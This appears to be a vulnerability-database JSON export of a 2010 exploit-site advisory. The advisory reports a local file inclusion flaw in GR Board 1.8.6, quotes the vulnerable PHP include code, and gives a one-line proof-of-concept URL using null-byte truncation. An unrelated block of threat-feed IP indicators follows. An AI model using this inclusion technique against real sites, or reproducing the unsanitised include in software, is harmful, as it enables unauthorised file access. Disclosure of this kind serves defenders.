{"id": "SECURITYVULNS:DOC:23969", "bulletinFamily": "software", "title": "GR Board v1.8.6. (theme) Local File Inclusion Vulnerability", "description": "===========================================================\r\nGR Board v1.8.6. (theme) Local File Inclusion Vulnerability\r\n===========================================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \ __ /'__`\ /\ \__ /'__`\ 0\r\n0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1\r\n1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0\r\n0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1\r\n1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0\r\n0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1\r\n1 \ \____/ >> Exploit database separated by exploit 0\r\n0 \/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ######################################## 1\r\n0 I'm eidelweiss member from Inj3ct0r Team 1\r\n1 ######################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\ndownload: http://sirini.net/grboard/board.php?id=grskin&articleNo=82\r\nAuthor: eidelweiss\r\nContact: g1xsystem[at]windowslive.com\r\n\r\n=====================================================================\r\n\r\nDescription:\r\n\r\nGRBoard (VERSION 1.8 )is bulletin board system of Korea.\r\nIt is freely available for all platforms that supports PHP and MySQL.\r\nBut I find Remote File Inclusion vulnerability.\r\n\r\n=====================================================================\r\n\r\n --=[ Vuln C0de ]=-\r\n\r\n[-] path/page.php\r\n\r\n-----------------------------------------------------------------------------------------\r\n\r\n// ????? ??? ?? ???\r\n$getConfigList = array('theme', 'title', 'logo', 'useOutlogin', 'outlogin', 'usePoll', 'poll'); // <= 1\r\n$countList = count($getConfigList); // <= 2\r\nfor($i=0; $i<$countList; $i++) $config[$getConfigList[$i]] = getVar($getConfigList[$i]);\r\n$content = @mysql_fetch_array(mysql_query('select var from '.$dbFIX.'layout_config where opt = \'page\' and var like \''.$_GET['id'].'|%\'')); // <= 3\r\n$content = str_replace($_GET['id'].'|', '', $content['var']);\r\n$path = 'layout/'.$config['theme'];\r\ninclude 'layout/'.$config['theme'].'/head.page.php'; // \r\n?>\r\n<div id="mainFrame"><?php echo $content; ?></div>\r\n\r\n<div class="clear"></div>\r\n<?php\r\ninclude 'layout/'.$config['theme'].'/foot.page.php'; // \r\n\r\n\r\n?>\r\n\r\n-----------------------------------------------------------------------------------------\r\n\r\n -=[ P0C ]=-\r\n\r\n http://127.0.0.1/path/page.php?theme= [LFI]%00\r\n\r\n=========================| -=[ E0F ]=- |=========================", "published": "2010-06-01T00:00:00", "modified": "2010-06-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23969", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:35", "edition": 1, "viewCount": 14, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2018-08-31T11:10:35", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-7273", "CVE-2014-2595", "CVE-2015-9286", "CVE-2008-7272"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32659", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:35", "rev": 2}, "vulnersScore": 6.3}, "affectedSoftware": []}

{"rst": [{"lastseen": "2021-03-05T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **101[.]51.13.170** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 23969: (First IP 101.51.0.0, Last IP 101.51.58.255).\nASN Name \"TOTNET\" and Organisation \"TOT Public Company Limited\".\nASN hosts 1829 domains.\nGEO IP information: City \"Nakhon Ratchasima\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-05T00:00:00", "id": "RST:3AD64788-5806-36BA-B1BA-44320FD39C4B", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 101.51.13.170", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-05T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **101[.]51.18.8** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 23969: (First IP 101.51.0.0, Last IP 101.51.58.255).\nASN Name \"TOTNET\" and Organisation \"TOT Public Company Limited\".\nASN hosts 1829 domains.\nGEO IP information: City \"Kantharawichai\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-05T00:00:00", "id": "RST:F13074B9-51A2-3269-9252-6D6646FC1F11", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 101.51.18.8", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **101[.]51.19.31** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **33**.\n First seen: 2021-02-03T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **shellprobe, generic**.\nASN 23969: (First IP 101.51.0.0, Last IP 101.51.58.255).\nASN Name \"TOTNET\" and Organisation \"TOT Public Company Limited\".\nASN hosts 1829 domains.\nGEO IP information: City \"Kantharawichai\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-03T00:00:00", "id": "RST:12541813-CA3C-369A-9BC1-DB35E9F41179", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 101.51.19.31", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-05T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **101[.]51.21.222** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-05T03:00:00, Last seen: 2021-03-05T03:00:00.\n IOC tags: **generic**.\nASN 23969: (First IP 101.51.0.0, Last IP 101.51.58.255).\nASN Name \"TOTNET\" and Organisation \"TOT Public Company Limited\".\nASN hosts 1829 domains.\nGEO IP information: City \"Noen Sanga\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-05T00:00:00", "id": "RST:4A034A09-080B-356B-A868-38ED97554007", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 101.51.21.222", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **101[.]51.23.131** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **45**.\n First seen: 2021-02-28T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **shellprobe**.\nASN 23969: (First IP 101.51.0.0, Last IP 101.51.58.255).\nASN Name \"TOTNET\" and Organisation \"TOT Public Company Limited\".\nASN hosts 1829 domains.\nGEO IP information: City \"Kantharalak\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-28T00:00:00", "id": "RST:EC3A0026-262A-3C0F-8D31-B908A0C0992E", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 101.51.23.131", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **101[.]51.23.223** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **43**.\n First seen: 2021-02-26T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **shellprobe**.\nASN 23969: (First IP 101.51.0.0, Last IP 101.51.58.255).\nASN Name \"TOTNET\" and Organisation \"TOT Public Company Limited\".\nASN hosts 1829 domains.\nGEO IP information: City \"Kantharalak\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-26T00:00:00", "id": "RST:A9DFA94D-3597-344F-9149-CD18C4C7676C", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 101.51.23.223", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **101[.]51.26.110** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **46**.\n First seen: 2021-03-02T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **shellprobe**.\nASN 23969: (First IP 101.51.0.0, Last IP 101.51.58.255).\nASN Name \"TOTNET\" and Organisation \"TOT Public Company Limited\".\nASN hosts 1829 domains.\nGEO IP information: City \"Nakhon Pathom\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-02T00:00:00", "id": "RST:48BAD6C3-C06D-38E9-BE7F-1F4BBAE7885B", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 101.51.26.110", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-15T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **101[.]51.32.134** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **39**.\n First seen: 2020-12-08T03:00:00, Last seen: 2020-12-15T03:00:00.\n IOC tags: **generic**.\nASN 23969: (First IP 101.51.0.0, Last IP 101.51.58.255).\nASN Name \"TOTNET\" and Organisation \"TOT Public Company Limited\".\nASN hosts 1829 domains.\nGEO IP information: City \"Maha Sarakham\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-08T00:00:00", "id": "RST:B15D1586-BA90-3CB4-B547-AB8D73D62EAD", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 101.51.32.134", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **101[.]51.24.192** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2021-03-02T03:00:00, Last seen: 2021-03-04T03:00:00.\n IOC tags: **shellprobe, generic**.\nASN 23969: (First IP 101.51.0.0, Last IP 101.51.58.255).\nASN Name \"TOTNET\" and Organisation \"TOT Public Company Limited\".\nASN hosts 1829 domains.\nGEO IP information: City \"Nakhon Pathom\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-02T00:00:00", "id": "RST:A27B938C-8124-3C42-B302-364E51C055EA", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 101.51.24.192", "type": "rst", "cvss": {}}, {"lastseen": "2020-07-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **101[.]51.33.238** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2020-07-01T03:00:00, Last seen: 2020-07-04T03:00:00.\n IOC tags: **generic**.\nASN 23969: (First IP 101.51.0.0, Last IP 101.51.58.255).\nASN Name \"TOTNET\" and Organisation \"TOT Public Company Limited\".\nASN hosts 1829 domains.\nGEO IP information: City \"Maha Sarakham\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-07-01T00:00:00", "id": "RST:E5531625-A7EF-313E-99FE-7D65922007BA", "href": "", "published": "2021-03-05T00:00:00", "title": "RST Threat feed. IOC: 101.51.33.238", "type": "rst", "cvss": {}}]}